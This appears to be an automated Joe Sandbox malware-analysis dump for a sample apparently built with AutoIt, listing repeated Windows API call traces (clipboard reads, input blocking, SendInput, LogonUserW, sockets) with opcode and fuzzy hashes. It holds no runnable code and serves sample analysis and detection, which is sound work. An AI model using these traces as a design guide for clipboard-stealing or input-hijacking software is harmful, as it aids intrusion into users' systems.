• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170576061-0
                                                                                                                                                                                                                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                                                                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                            • Opcode ID: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                                                                                                                                                                                                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                            • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                                                                                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
• Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
• Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
• Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
• Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
• Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
• Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                                                                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: N@
                                                                                                                                                                                                                                                            • API String ID: 0-1509896676
                                                                                                                                                                                                                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
APIs
• DeleteObject.GDI32(?), ref: 0045953B
• DeleteObject.GDI32(?), ref: 00459551
• DestroyWindow.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• GetWindowRect.USER32(00000000), ref: 00459588
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetClientRect.USER32(00000000,?), ref: 004596F8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
• GlobalLock.KERNEL32(00000000), ref: 0045978F
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• GlobalUnlock.KERNEL32(00000000), ref: 004597A5
• CloseHandle.KERNEL32(00000000), ref: 004597AC
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• GlobalFree.KERNEL32(00000000), ref: 004597E2
• CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
• SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
• ShowWindow.USER32(?,00000004), ref: 00459865
• CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• GetStockObject.GDI32(00000011), ref: 004598CD
• SelectObject.GDI32(00000000,00000000), ref: 004598D5
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
• DeleteDC.GDI32(00000000), ref: 004598F8
• _wcslen.LIBCMT ref: 00459916
• _wcscpy.LIBCMT ref: 0045993A
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
• GetDC.USER32(00000000), ref: 004599FC
• SelectObject.GDI32(00000000,?), ref: 00459A0C
• SelectObject.GDI32(00000000,00000007), ref: 00459A37
• ReleaseDC.USER32(00000000,00000000), ref: 00459A42
• MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
Strings
Similarity
• API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
